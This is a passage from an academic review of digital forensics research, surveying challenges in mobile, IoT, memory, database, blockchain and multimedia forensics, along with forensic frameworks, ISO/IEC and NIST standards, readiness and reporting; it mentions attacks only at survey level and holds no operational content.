device should be powered on) [50]. In addition, an important barrier for actually conducting MF investiga- tions relates to the various networking capabilities of smart- phones, which render the overall MF processes dif cult to manage, particularly due to the complex structure of the cloud computing environment [51]. Finally, due to the security measures inherent to modern mobile devices, an investigator must actually break into the device using an exploit that will most likely alter the device data. Clearly, the latter violates the Association of Chief Police Of cers (ACPO) principle 25470 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews and introduces numerous procedural issues for a forensic investigation. In Table 5, we provide a classi cation of MF approaches' current challenges. TABLE 5. High level extraction of limitations in mobile forensics. D. IOT Although signi cant in terms of improved data availability and operational excellence, the broad adoption of IoT devices and IoT-related applications have brought forward new secu- rity and forensics challenges. IoT forensics is a branch of digital forensics dealing with IoT-related cybercrimes and includes the investigation of connected devices, sensors and the data stored on all possible platforms. According to the literature, several of the current limita- tions of IoT forensics include the management of different streams of data sources, the complicated three-tier architec- ture of IoT, the lack of standardized systems for capturing real-time logs and storing them in a valid uniform form, the preparation of highly detailed reports of all information gathered its corresponding representation, the preservation and acquisition of evidence considering its volatility and value of data, and the adoption of routine forensic tasks in the IoT ecosystem [52][56]. Data encryption trends also present additional challenges for IoT forensic investigators, and arguably cryptographically protected storage systems is one of the most signi cant barriers hindering ef cient dig- ital forensic analysis [54], [57], [58]. Other studies high- light additional limitations of IoT forensics processes such as interoperability and availability issues related to the vast amount of connected IoT devices [54][56], [59], the Big Data nature of the IoT forensics evidence (Variety, Velocity, Volume, Value, Veracity) [55], [58], [60] and the various security storage challenges of IoT forensics evidence, espe- cially when related to biometric data [61]. Finally, various regulatory-related challenges also exist in the IoT forensics domain, particularly issues relevant to the ownership of data in the cloud as de ned by region-speci c laws [54][56], [58], [59]. For instance, service-level agreements stipulating the ``terms of use'' of the cloud resources between the cloud customer and the cloud service provider do not incorporateforensic investigations' provisions. Legislative frameworks adopted in speci c regions, such as the GDPR in Europe, also pose signi cant challenges for IoT forensic investigations, particularly data privacy provisions [53][56]. Finally, the use of blockchain and its capability to enhance IoT forensic investigations has been also discussed in [54]. In Table 6 we provide a classi cation of the current challenges of IoT forensics approaches. TABLE 6. High level extraction of limitations in IoT forensics. E. FILESYSTEMS, MEMORY AND DATA STORAGE FORENSICS Forensic analysis of large lesystems requires ef cient meth- ods to manage the potentially large amount of les and data contained in them. System logs are one of the most used information sources to leverage forensic investigations. In [62] the authors provide a review of the publicly available datasets used in operating system log forensics research and taxonomy of the different techniques used in the forensic analysis of operating system logs. The taxonomy is cre- ated based on a common investigation format that includes event logs recovery, event correlation, event reconstruction and visualization. Distributed lesystem forensics is even a more challenging task, such as in the case of identifying the malicious behaviour of the attackers by analysing cloud logs [63]. Nevertheless, the accessibility attributes associated with cloud logs impede the goals of investigating such infor- mation, as well as other challenges, similar to those extracted in Section III-A. Another challenging area is the analysis of proprietary systems such as SCADA systems. In [64] the authors present a survey on digital forensics that are applied to SCADA systems. The survey describes the challenges that involve VOLUME 10, 2022 25471 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews applying digital forensics to SCADA systems as well as the range of proposed frameworks and methodologies. The work also focuses on the research that has been carried out to develop forensic solutions and tools that can be tailor- made for the SCADA systems. Recent research has revealed that malware developers have been using a broad range of anti-forensic techniques and escape routes in-memory attacks and system subversion, including BIOS and hypervisors. In addition, code-reuse attacks such as returned oriented programming pose a serious remote code execution threat. To neutralise the effects of malicious code, speci c tech- niques and tools such as transparent malware tracers, system- wide debuggers were proposed. In [65], authors present a survey on the state-of-the-art techniques that demonstrate the capability of thwarting the anti-forensic strategies previously mentioned. Memory forensics refers to the forensic analysis of a sys- tem's memory dump. A system's memory can contain evi- dence related to the usage of the system, including the list of running processes, network connections, or the keys for the driver's encryption. Usually, such data are not stored in the permanent storage of the system and are completely lost when the system is turned off or unplugged from the power. In the literature, we can nd surveys devoted to the analysis of the memory acquisition techniques [66], [67] (i.e., both hardware and software-based), the subsequent memory analysis [68], and the available tools [67]. The main challenges of memory forensics derive from the fact that memory is volatile, so it has to be acquired when the system is running and thus probably modi ed by the running applications. This can lead to the page smearing issue [68], i.e., inconsistencies between the state of the memory as described by the page tables compared with the actual contents of the memory. Another issue that can occur during the memory acquisition is the incorpora- tion of pages, which are not present in the memory due to page swapping or demand paging [68]. Finally, although the memory acquisition techniques should be OS and hardware agnostic [66], each OS architecture handles the memory dif- ferently and is equipped with distinctive tampering protection mechanisms that hinder access to memory. A database (DB) is the most traditional way to organise and store data. The majority of applications and online ser- vices deploy some type of DB to store records about their customers, nancial records, inventory, etc. Besides the vast amount of data that could be contained in a DB, a database management system (DBMS) which allows the end-users to administer the DB and store and access the data in a speci c format, can also provide evidence of actions in user- level granularity. For instance, it can reveal who and when stored/accessed speci c records. Therefore, digital forensics for DB has attracted the attention of the research commu- nity [69]. From this perspective, several surveys focused on database digital forensics based on the log les, metadata, and similar types of artefacts for the case of relational and NoSQL DB [70][72]. Furthermore, other authors addressed the digital forensic opportunities on the procedure of dataTABLE 7. High level extraction of challenges in file system, memory and data storage forensics. aggregation and analysis, as well as their structural architec- ture to bene t forensic procedures [69], [73]. Digital triage is of special relevance here since reviewing many poten- tial sources of digital evidence for speci c information by using either manual or automated analysis is mandatory to enhance investigations [73]. Nevertheless, the authors high- light that the legitimacy of several acquisition procedures is constrained by the applicable legislation and that the current state of practice requires more ef cient solutions, especially when dealing with huge amounts of data. In [74], the authors presented a framework for database forensic investigations enhanced by forensic experts' opinions with the aim to over- come the main issues that investigator's face, such as the lack of standardized tools and different data structures and log structures. Considering the increasing amount of IoT technologies and small devices that require live data analysis due to the volatility of the data stored in them, it is crucial to develop new strategies to enhance data acquisition procedures [75]. In the context of database forensics and data acquisition, the challenges of big data analysis and data mining techniques for digital forensics [76], [77], and text clustering [78] were investigated. Moreover, a survey of techniques to perform similarity digest search is provided in [79]. Table 7 summarises the main limitations and challenges extracted from the literature analysed in this section. F. BLOCKCHAIN Blockchain technology has been constantly integrated into existing systems or used as the basis to rebuild systems from 25472 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews scratch in various domains. Besides the nancial domain to which it was initially applied, through bitcoin, blockchain technology is currently used in various other use cases such as supply chain management, cybersecurity enhancement, document/certi cates validation, crowdfunding campaigns, and more [80]. Additionally, because nancial system set on blockchain provide more privacy than traditional pay- ment systems, it is common for cryptocurrencies to be used for criminal activities [81]. This sets blockchain forensics methodologies as a necessity [82] due to the large volume of data that are stored in blockchain systems and the number of processes that are managed by such systems. The main prop- erty of blockchain-based systems is the guaranteed protection of data integrity, which is directly related to forensic analysis. On the one side, this property makes forensic analysis more manageable. However, on the other side, this may complicate the process as users may be more cautious when interacting with such systems. It has to be noted that a large portion of blockchain systems are public, allowing access to everybody and thus making forensic analysis a surplus process. A forensics investigator can set up a node in a public blockchain network, sync it with the rest of the nodes and obtain a local copy of the ledger. Even in such cases, the structure of the information stored in the ledger of blockchain systems is not optimal with respect to retrieving all required data (e.g., for a speci c account or a speci c smart contract), so ef cient mechanisms are required [83] to extract valuable information out of the large volume of data stored in public ledgers [84]. In the case of private blockchain systems, the ledger data are not publicly available and traditional forensics approaches have to be applied to blockchain nodes to extract data. Even if data are by default publicly available, it is still challenging to identify malicious activity on such platforms. It is common for deployed smart contracts to suffer from var- ious vulnerabilities either due to poor implementation or not properly con gured blockchain networks [85]. In such cases, users can take advantage of such vulnerabilities, mainly aim- ing at nancial pro t. It is challenging to detect such activity and identify the actors that have initiated it. Smart contracts execution is not a straightforward process, and past execution cannot be easily repeated in a forensic sound way [86]. Apart from that, smart contracts may also get self-destructed by a special OPCODE that makes following past transactions even harder [87]. Furthermore, privacy concerns have been raised concern- ing early open public blockchain systems, and thus, there have been multiple alternative systems that make use of var- ious privacy-enhancing techniques such as zero-knowledge proofs, onion routing or ring con dential transactions to pro- tect users privacy [88]. In such cases, forensics analysis of either network nodes or users' wallets is required to retrieve either logs or cryptographic keys that can be used along with data existing on public ledgers and provide more information about the transactions that have taken place.While the data stored in the ledger are of great impor- tance, there are more data to be considered when analyzing a blockchain node. The ledger holds all committed transac- tions, but a blockchain node stores more information with respect to its interactions with other nodes or clients. For example, the IP of the client that has connected to a node to submit a transaction or the activity of a speci c node in the network (e.g., sync requests) are not included in the ledger's data. On top of those, multiple security blockchain attacks are mainly targeted against the infrastructure or the network's backbone and not against its content. Mining attacks, network and long-range attacks [89], [90] target at taking control of the blocks formation process, to maliciously alter past committed transactions and achieve double-spending attacks. In such cases, digital evidence from deployed nodes is the only way to prove malicious activity. At the same time, the size of the network in public blockchain systems makes it even harder to retrieve the required evidence. Table 8summarises the main challenges extracted from the blockchain forensics literature. TABLE 8. High level extraction of challenges in blockchain forensics. G. MULTIMEDIA Due to the increasing number of ubiquitous technologies (e.g., IoT devices, smartphones, wearables) leveraged by the 4thindustrial revolution, as well as a substantial improvement in the connectivity capabilities in smart scenarios due to 5G, the amount of multimedia prosumers (i.e., both producers and consumers of data) is increasing dramatically year after year.2Nevertheless, such multimedia content growth is a double-edged sword. On the one hand, it is a synonym of opportunities for the industry, companies and users. On the other hand, it augments the possible vulnerabilities and attack vectors of such systems, which malicious users can exploit. Digital forensics in the context of multimedia has received substantial attention from the research community. There exist numerous image forgery detection surveys exploring the topic from a global perspective [91][99]. In this con- text, pixel-based image forgery detection is one of the main topics [100], including image splicing forgery [101], and copy-move forgery [102][104], which is a well-known tech- nique in which parts of the current images are used to cover/hide speci c characteristics. Some authors focused on 2https://wearesocial.com/blog/2020/01/digital-2020-3-8-billion-people- use-social-media, https://www.cisco.com/c/en/us/solutions/collateral/ executive-perspectives/annual-internet-report/white-paper-c11-741490. html VOLUME 10, 2022 25473 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 9. High level extraction of challenges in multimedia digital forensics. passive techniques to detect forgery [105], or carving on speci c le formats such as JPEG [106]. Other image foren- sics surveys analysed topics such as hyperspectral image [92], [107], image authentication [108], the affectation of noise in images [109] and image steganalysis [110][114]. Another set of surveys focus on the speci c context of child abuse material and its detection through image and video analysis [115][118]. More recently, the advent of deep learning techniques has enhanced the capabilities of image integrity detection and veri cation, outperforming tra- ditional methods in several image-related tasks, especially in these where anti-forensic tools were used [113], [114], [119]. In the context of video les, we can nd surveys on video steganalysis [113], [114], [120], video forgery detection [95], [96], [98], [114], [121], [122], video forensic tools [95], [113], [123], [124], video surveillance analysis [125], [126], and video content authentication [127]. Finally, digital audio forensics has also been studied in [128]. Table 9 summarises the main limitations and challenges extracted from the multi- media forensic literature. H. MISCELLANEOUS This section is devoted to the digital forensics reviews that fall beyond the domain categorisation of the previous paragraphs. As observed in most topics, anti-forensics can be under- stood as a standalone concern in digital forensics, which requires investigation in each context. The term anti-forensics refers to methods and strategies that prevent forensic inves- tigators and their tools from achieving their goals. There areseveral examples of anti-forensic methodologies [129], such as encryption, data obfuscation (e.g., trail obfuscation), arti- fact wiping, steganography and image tampering [130], protected/hidden communications (e.g., tunnelling, onion routing), malware anti-sandbox/debug, VM and in general anti-analysis methods [131][134], and spoo ng. As stated in [135], anti-forensic methods exploit the dependence of human elements on forensic tools, as well as the limita- tions of the underlying hardware in terms of architecture and computational power. Therefore, enhancing the train- ing and knowledge level of investigators and more robust forensic procedures (e.g., anti-anti forensic techniques [130]) are critical to minimise the impact of anti-forensics. In this line, some authors argue that the use of proactive foren- sics models could help enhancing the robustness of forensic investigations [136]. Another emerging topic in digital forensics is related to unmanned aerial vehicles (UA Vs), or more commonly known as drones [137]. The applications and versatility of these devices are becoming more popular in a myriad of contexts, from industrial to military applications. One of the main challenges of drone forensics is the set of different hardware components that are part of a drone [138], and the partic- ular treatment that they require (i.e., with special regard to advanced anti-forensic techniques taking place [139], as well as the necessity of live forensics [137], [140] in this context). For instance, drones consist of sensors, ight controllers, electronic and hardware components, on-board computers, and radiofrequency receivers, each one linked to one or many evidence sources in terms of, e.g., data storage (the differ- ent memory sources present in the drone, such as memory cards storing media, or other software), data communications and other logs and data stored in sources related to the drone, such as the drone controller and external cloud-based sources [141], [142]. At the moment of writing, there are no baseline principles, standards, nor legislation covering all the particularities of forensic drone investigations [137], [142]. Thus, efforts towards the establishment of sound protocols, speci c forensic frameworks, as well as drone-based forensic tools are critical [137]. In [143], authors surveyed the different dimensions and concerns which digital forensics should cover in the context of social networks. The authors discussed several aspects of social networks, such as privacy and security issues, the criminal and illegal acts that can occur, and the attacks on the underlying platform and the users. In addition, they describe several strategies to detect such abnormal behaviours along with the necessity to develop both pro-active and reactive mechanisms. In terms of community detection, graph analytic methods and tools are crucial to detect criminal networks in different contexts, such as nance, terrorism, and other het- erogeneous sources [144]. In [8], authors surveyed the efforts done so far on the analysis of social network shared data according to source identi cation, integrity veri cation and platform provenance. Moreover, authors discussed the cur- rent methodologies, and highlighted the current challenges 25474 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews along with the need for multidisciplinary approaches to over- come them. A sector that is receiving increasing attention due to its crit- ical relevance to the proper functioning of our society is the energy sector, and more concretely, the smart grid. In [145], authors explore practical cybersecurity models and propose some guidelines to enhance the protection of the smart grid against cyber threats. Moreover, they explore software- de ned networks and their main bene ts and challenges. Finally, the authors propose a conceptual forensic-driven security monitoring framework and highlight the relevance of forensics by design in development phases. Context-aware scenarios such as smart cities have been also receiving increased attention due to their complex structures, requiring the continuous data collection, processing and interaction between a myriad of devices [146], [147]. Digital forensics in this particular scenario is a recent paradigm which requires further efforts from the research community to enhance cyber resilience and to provide ef cient incident response mechanisms [147]. I. CHALLENGE ANALYSIS AND AGGREGATED RESULTS The classi cation of challenges and limitations according to each topic of the taxonomy has been conducted to keep a balance between accurate descriptions of challenges and hier- archical classi cation. On the one hand, we want to facilitate identifying the gaps and limitations of each topic and pro- vide a clear path for both new and experienced investigators towards the corresponding literature. On the other hand, and as stated in Section I, we provide the reader with a clear overview of the research lines that should be strengthened in the digital forensics ecosystem, as well as their interre- lations according to each topic of our taxonomy. Therefore, we used the extracted challenges of each topic and merged the ones appearing more than once (i.e., the ones appearing only in their corresponding topic were ignored due to their speci city) to create a comprehensive overview of the digital forensics challenges in Table 10. As it can be observed, we identi ed several limitations of digital forensics that can be applied in several topics or contexts and thus, indicate the need to devote more research efforts towards them. Note that, for instance, the last topic of the Table 10appears to be only affecting IoT, yet we identi ed this challenge in the miscella- neous topic, and thus, we decided to include it. Nevertheless, since several topics are analysed in such a category, we did not represent them in Table 10. The most reported challenge is the sound data acquisition from heterogeneous sources and its interpretation, includ- ing different hardware and monitoring processes collecting data and logs dynamically. Note that data acquisition and management is a challenge affecting activities related to dig- ital forensics. Moreover, data fragmentation, a common sce- nario nowadays, hinders investigations further. It is important to note that data acquisition is critical to creating bench- marks, which help researchers and practitioners to evalu- ate their models. The latter enables characteristics such asreproducibility and pushes the advancement in the state of the art, which is needed to keep up with the pace of tech- nology development [148], [149]. The next most challenging issue is related to anti-forensics methods, which has been discussed in several sections of the taxonomy as well as in Section III-H. Anti-forensic strategies leveraged by malicious actors include adversarial methods such as obfuscation or encryption applied to, e.g., data and storage systems, as well as hardware-related technological challenges, such as mobile phones due to their inherent security measures, or in the case of drones due to their speci c particularities, and software, as well as in the case of malware. In the case of tools and eval- uation benchmarks, it is evident that the community needs to devote more efforts towards ghting novel cybercrime, especially in topics where, e.g., different data sources and technologies are present. For instance, in the case of IoT and UA Vs, different data sources may necessitate different digital forensics strategies, including tools related to device level forensics, network forensics, and cloud forensics. Another challenge that affects digital forensics is the lack of juris- dictional and legal requirements for different investigation scenarios such as ethics and data management of con dential and personal data. This is particularly relevant nowadays due to the widespread use of distributed systems such as blockchain and the cloud. The latter means that software and data may reside in different countries, and thus, speci c cross-border collaborations are required, adding another layer of complexity to digital investigations. Moreover, this sce- nario impedes the adoption of proactive measures due to the dif culty of applying measures that conform to different legal frameworks. A proper understanding between all the actors involved in the digital forensics context, including stakeholders, LEAs, and court members, is mandatory to ensure the success- ful prosecution of perpetrators. In this regard, one of the highlighted challenges is to ensure that all partners have a suf cient level of training (including technical knowledge and standardised guidelines) and a proper understanding, including readable reports to enable a fruitful collaboration. Moreover, while it seems procedural, the chain of custody is still a challenge. This can be attributed to multiple reasons, such as obvious negligence of the corresponding personnel to properly report evidence acquisition and/or handling, cor- rupted of cers, or even gaps in the process. Nevertheless, all of them cause severe issues in a court as a case can be missed or misjudged. Secure and auditable means of storing and processing the chain of custody, as proposed by LOCARD3 with the use of blockchain technology seems like a logical and stable solution. A more thorough description of forensic read- ability and its challenges is discussed later in Section IV-C. Data acquisition, as previously stated, is not only a chal- lenge in terms of the existing heterogeneous data sources and context but also in terms of size. The big data era comes with a myriad of opportunities but also with their corresponding 3https://locard.eu/ VOLUME 10, 2022 25475 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 10. Cross-domain abstraction of the challenges and limitations of digital forensics, ordered by relevance according to the amount of times they were found in the topics of the taxonomy. For the sake of fairness, the general column Miscellaneous has been omitted. challenges, since logging and data acquisition in speci c scenarios may pose technical challenges. This issue is exacerbated when coupled with cross-border investigation requirements due to data fragmentation. Moreover, once data corresponds to multiple forensic contexts, the complexity of performing digital investigation grows exponentially, leaving aside the need to perform live forensics according to the par- ticularities of the hardware. Additionally, the availability of some devices due to their resource-constraint nature is a fur- ther challenge. For instance, IoT botnets have high volatility, and UA Vs may implement self-defence mechanisms, even at the physical level. In the case of the Miscellaneous category, we included the challenges and limitations of anti-forensics, drone forensics, smart grid, smart cities and social networks. According to the outcomes depicted in Table 10, we can observe that topics such as IoT, cloud, and mobile are affected by the highest amount of challenges. Therefore, we believe that researchers and practitioners should devote more efforts to solving such topics' challenges by leveraging cross-domain collaborations to enhance the quality and appli- cability of their outcomes. Similarly, other challenges which appear in several topics could be tackled more quickly if they were targeted with a multidisciplinary approach, with experts from the different digital forensics topics. To create a visual representation of these challenges, we believe that mapping each challenge into different cate- gories will highlight which need to be reinforced. Therefore, Figure 4presents the outcomes of our taxonomy in terms of topic challenges mapped into different categories repre- senting different phases, from the creation of the legal basis and framework of an investigation to the nal reporting of the outcomes. As it can be observed, the challenges most cited in the literature are present in the evidence acquisition and data pre-processing category. They are mainly related to data acquisition issues and anti-forensics. Notably, these challenges affect the forensic procedures from the beginning (i.e., if we do not consider the standards, legislation and procedural category), and thus, it is crucial to devote efforts toovercome them. The investigation and forensic analysis cat- egory contains the highest number of challenges. Therefore, the topics identi ed in the taxonomy share similar technical concerns in their corresponding contexts, and more multidis- ciplinary collaboration is needed towards such direction. The reporting and presentation category highlights one yet crit- ical challenge since the proper reporting of an investigation affects the outcome of the whole investigation. We further dis- cuss about forensic readability and reporting in Section IV-C. IV. DIGITAL FORENSICS METHODOLOGIES, PRACTICES AND STANDARDS In addition to the topic-based taxonomy presented in Section III, we collected a set of literature reviews, included in our research methodology, that analysed forensic frame- works and process models, and the adaptability and forensic readiness of the actual practices. In the following sections, we analyse the content of such reviews by extracting the chal- lenges and identifying the main qualitative features required to achieve forensically sound investigations. A. FORENSIC FRAMEWORKS AND PROCESS MODELS A digital forensics framework, also known as a digital foren- sics process model, is a sequence of steps that, along with the corresponding inputs, outputs and requirements, aim to sup- port a successful forensics investigation [150], [151]. A digi- tal forensics framework is used by forensics investigators and other related users to ease investigations and the identi cation and prosecution of perpetrators. In addition to a set of speci c steps identifying each investigation phase, the use of digital forensic frameworks enables timely investigations, as well as a proper reconstruction of the timeline of events and their associated data. In this regard, one of the most critical aspects of a digital investigation is the proper preservation of the evidence chain of custody, since it could lead to unsolvable inconsistencies, risking the admissibility of evidence in court. According to their phases and their granularity, there are different investigation models suitable for different types 25476 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews FIGURE 4. Main digital forensic challenges mapped into different categories according to their application context, from the initial steps of an investigation (left) to the final ones (right). The size of each circle denotes the times it appeared considering the topics of the taxonomy. of investigations. In this regard, Kohn et al. provide [152] an integrated suitability framework that maps a set of require- ments derived from an ongoing investigation to the most suitable forensic procedure. Moreover, the authors also use a graph-based approach to associate the most well-known forensic frameworks and their interrelationships regarding the number of phases and their content. Other well-known frameworks include the Analytical Crime Scene Procedure Model (ACSPM) [153], the Systematic digital forensic inves- tigation model (SRDFIM) [154], and the advanced data acquisition model (ADAM) [155]. In general, law enforce- ment agencies follow variants of the ACPO (Association of Chief Police Of cers) guidelines [156]. Finally, other foren- sic guidelines and models proposed by NIST and INTERPOL can be found in [5], [157]. The most well-known digital forensic frameworks are summarised in Table 11. In general, the procedures summarised in Table 11have a common hierarchical structure [165], [166], which can be divided in the steps described in Table 12. Note that some of the models may include more granular approaches to some of the steps, which are necessary due to the investigation context (e.g., speci c devices and seizure/acquisition constraints). In the case of the chain of custody and trail of events preservation, a forensically sound procedure needs to ensure features such as integrity, traceability, authentication, veri- ability and security [167], [168]. In this regard, Table 13 provides a description of each feature. In the past, several authors identi ed several challenges in digital investigation processes [77], [169][175], mainly related to the chain of custody preservation, the growth of the data to be processed, and privacy and ethical issues when collecting such data. In addition, our research methodology identi ed several literature reviews which discussed the chal- lenges and limitations of forensic frameworks. For instance, in [176], the authors leveraged a summary of digital forensic frameworks and tools as well as their interrelationships by using a graph analysis methodology. In addition, they dis- cussed some challenges and limitations of privacy-preservingdigital investigation models and proposed some measures to palliate them. In [177] the authors presented a chronological review of the most well-known forensic frameworks and their characteristics. The work presented in [178] evaluates the cur- rent frameworks among European law enforcement agencies, identifying and de ning elements of robustness and resilience in the context of sustainable digital investigation capacity so that organisations can adapt and overcome deviations and novel trends. In [175], the authors identi ed the need to de ne speci c models according to the forensic context, such as in the case of Mobile Forensics [175]. Moreover, the authors proposed a speci c forensic framework to improve Mobile Forensics investigations. Further reviews of the most used forensic frameworks and their features can be found in [179], [180]. Table 14reports the main challenges in forensic frameworks identi ed by each literature review. In parallel to forensic guidelines and frameworks, stan- dards are crucial to ensure conformance and mutual compli- ance across geographical and jurisdictional borders. There are currently numerous standards and established practices pro- vided by organisations worldwide using accepted methods. The technical details on how to forensically approach a given investigation differ depending on the device. The analysis of electronic evidence is typically categorised into the phases stated in Table 12. However, the exact phases naming may vary due to different forensic models' usage according to each organisation's needs. While not an of cial standard, the Cyber-investigation Analysis Standard Expression (CASE)4is a community- driven standard that aims to develop an ontology that can ef - ciently represent all exchanged information and roles within the context of investigations regarding digital evidence. The International Organization for Standardization (ISO) has released a series of standards to assist in this effort by providing the family of ISO 27000, focusing on informa- tion security standardisation procedures. In what follows, 4https://caseontology.org/ VOLUME 10, 2022 25477 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 11. Most well-known forensic models and guidelines. TABLE 12. Main steps in a digital forensic investigation model. TABLE 13. Main features required to guarantee chain of custody preservation. we present the most relevant standards about digital forensics investigations, which are summarised in Figure 5. ISO/IEC 17025:2017: In some terms, this standard can be considered an ``infrastructure'' standard for forensic labs. It de nes the managerial and techni- cal requirements that testing and calibration labora- tories must conform to ensure technical competence and guarantee that their test are calibration results are acceptable by the corresponding suppliers and regulatory authorities. ASTM E2916-19: The goal of this standard is to assemble the necessary technical, scienti c and legal terms and the corresponding de nitions in the context of the examination of digital and multi- media evidence. Therefore, the standard spans toTABLE 14. High level extraction of challenges reported in forensic frameworks literature reviews. various areas such as computer forensics, image, audio and video analysis, as well as facial iden- ti cation. As a result, ASTM E2916-19 creates a common language framework for all. ISO 21043-2:2018: This standard speci es many requirements for the forensic processes in focus- ing on recognition, recording, collection, transport and storage of items of potential forensic value. It includes requirements for the assessment and examination of scenes but is also applicable to activ- ities that occur within the facility. This document also includes quality requirements. ISO/IEC 27035: This is a three-part standard that provides organisations with a structured and planned approach to the management of security incident management covering a range of incident response phases ISO/IEC 27037:2012: This standard provides gen- eral guidelines about the handling of the evidence of the most common digital devices and the cir- cumstances including devices that exist in vari- ous forms, giving the example of an automotive system [181]. ISO/IEC 27038:2014: Describes the digital redac- tion of information that must not be disclosed, taking extreme care to ensure that removed infor- mation is permanently unrecoverable. 25478 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews FIGURE 5. Applicability of standards and guidelines to the investigation process classes and activities. ISO/IEC 27040:2015: Provides detailed technical guidance on how organisations can de ne an appro- priate level of risk mitigation by employing a well- proven and consistent approach to the planning, design, documentation, and implementation of data storage security. ISO/IEC 27041:2015: Describes other standards and documents to provide guidance, setting the fundamental principles ensuring that tools, tech- niques and methods, appropriately selected for the investigation. ISO/IEC 27042:2015: This standard describes how methods and processes to be used during an investi- gation can be designed and implemented to allow correct evaluation of potential digital evidence, interpretation of digital evidence, and effective reporting of ndings.ISO/IEC 27043:2015: It de nes the key common principles and processes underlying the investiga- tion of incidents and provides a framework model for all stages of investigations. ISO/IEC 27050: This recently revised stan- dard guides non-technical and technical person- nel to handle evidence on electronically stored information (ESI). ISO/IEC 30121:2015: Provides a framework for organizations to strategically prepare for a digital investigation before an incident occurs, to maximise the effectiveness of the investigation. ETSI is a European Standards Organization that produces standards for ICT systems and services used worldwide, collaborating with numerous organisations. In 2020, ETSI published TS 103 643 V1.1.1 (2020-01) [182], a set of tech- niques for assurance of digital material in a legal proceeding, VOLUME 10, 2022 25479 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews to provide a set of tools to assist the legitimate presentation of digital evidence.5In the meantime, the National Institute of Standards and Technology (NIST) has released guide- lines for organisations to develop forensic capability (see also Table 11), based on the principles of forensic science in the aspect of the application of science to the law. Still, it should not be used on digital forensic investigations due to subjection to different laws and regulations, as clearly stated in their manual. The scope of NIST guidelines is incorpo- rating forensics into the information system life cycle of an organisation. The most relevant guidelines are 800-86 [183] for Integrating Forensic Techniques into Incident Response and 800-101 [184] for Mobile Device Forensics. The Scienti c Working Group on Digital Evidence (SWGDE) is an organisation engaged in the eld of digital and multimedia evidence to foster communication and coop- eration as well as to ensure quality and consistency within the forensic community. SWGDE has released several documents to provide the current best practices on a large variety of state of the art forensics subjects. Nonetheless, none of them is targeting or addressing drone forensics's particularities. Finally, a review of the international development of forensic standards can be found in [185]. B. FORENSIC READINESS In the past, forensic investigations leveraged a post-event approach, mainly focusing on the analysis of data related to a past incident. In this regard, forensic readiness in terms of pro-active techniques and protocols appeared to minimise the cost and the impact of incidents and are widely used nowadays [15], [186][188]. We can nd different research approaches, such as the review conducted in [189], in which authors discussed how to achieve forensic readiness by collecting the opinion of experts to elaborate a readiness framework with which improve forensic investigations from an organizational per- spective. In the case of [190], authors discussed forensic readiness and several procedures to achieve it, such as fos- tering the use of Trusted Platform Modules (TPM). Other authors reviewed measures to achieve forensic readiness in a holistic way [15], [191][194], as well as recalling the relevance to include and expand the actual guidelines towards incident response readiness (e.g., as in the drafts of the ISO/IEC JTC 1/SC 27 working groups, and the ISO/IEC 27035), training and collaboration between stake- holders involved in forensic investigations and prosecution, and effective reporting readability and complexity. Table 15 describes the main forensic readiness challenges identi ed by the authors in the literature. Finally, in Table 16we provide a qualitative summary of the literature reviewed in IVaccording to the topics discussed in each article. From Table 16we can see that topics such as privacy and ethics and the suitability of frameworks that are being proposed to ght novel cybercrime need to be further 5https://www.swgde.org/documents/publishedTABLE 15. High level extraction of challenges reported in forensic readiness literature reviews. discussed in the literature. Nevertheless, as previously stated in the article, one of the main challenges is that cybercrime evolves faster than countermeasures and legislations, and thus, investigators are always one step behind. C. FORENSIC READABILITY AND REPORTING The continuous appearance of novel ICT technologies, paired with discovering new vulnerabilities and attacks that threaten them, dramatically increases the amount of information col- lected during forensic investigations. The latter refers to the amount of data collected from devices and systems, as well as the heterogeneous data structures required in each case and the speci c forensic methodologies developed to detect such threats. In this context, creating interoperable and auditable forensic procedures is a hard task, especially due to the lack of standardised reporting mechanisms. Moreover, qualitative aspects such as the outcomes and conclusions supported by the forensic analysis are often not reported accurately in an attempt to balance between technicality and comprehensibil- ity, hindering the robustness of the ndings [14], [198], [199]. Of particular relevance is the communication and readability of such reports, especially if these are to be interpreted by law practitioners, judges, and other stakeholders who do not always have the necessary technical background about the forensic tools nor the underlying technologies anal- ysed [200], [201]. The latter issue has been extensively anal- ysed according to different approaches, from lexical density and complexity [202][208], to cognitive and psychological features [209], [210], showcasing the need to improve the reporting mechanisms and the possible bene ts of a common, standardised framework. In addition to such a framework, it is crucial to develop the corresponding training procedures for its adoption [211]. It is necessary to recall that the admissibility of a piece of evidence and the forensic validation in court is mandatory to the proper prosecution of perpetrators and constitute the culminating point of an investigation [212], [213]. Therefore, several authors collected the challenges and issues related to the acceptance of evidence in court [196], [197], [212]. More- over, region-focused studies can be found in [213] and [197] for the United Kingdom and Australia, respectively. 25480 VOLUME 10, 2022 F. Casino et al.: Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews TABLE 16. Qualitative analysis of the literature reviews related with digital forensic guidelines, frameworks, tools, and readiness. Notation: Xdenotes that this topic is analysed, while denotes that its only partially discussed or just named. TABLE 17. Proposed representation of the content of a forensic report according to the inputs collected from the literature. After analysing the previous literature of forensic reporting procedures and studying the technical level of the data to be included [214], [215], as well as analysing existing investiga- tion models such as ISO/IEC 27043:2015 [216], we identi ed a set of key points and structural features that such document should include. In parallel, we analysed the technical level associated with each characteristic as reported in the liter- ature and created a reporting guideline document, which is represented in Table 17. As it can be observed, summaries, overview descriptions and listings should be performed in a comprehensive, non-technical way. In the case of tool descriptions, as well as proofs guaranteeing the outcomes, the report should contain some technical yet understandable descriptions. Finally, the scienti c aspects and details behind the analysis and the corresponding methodologies require descriptions that should be provided by quali ed experts. D. DATA MANAGEMENT AND ETHICS When discussing digital 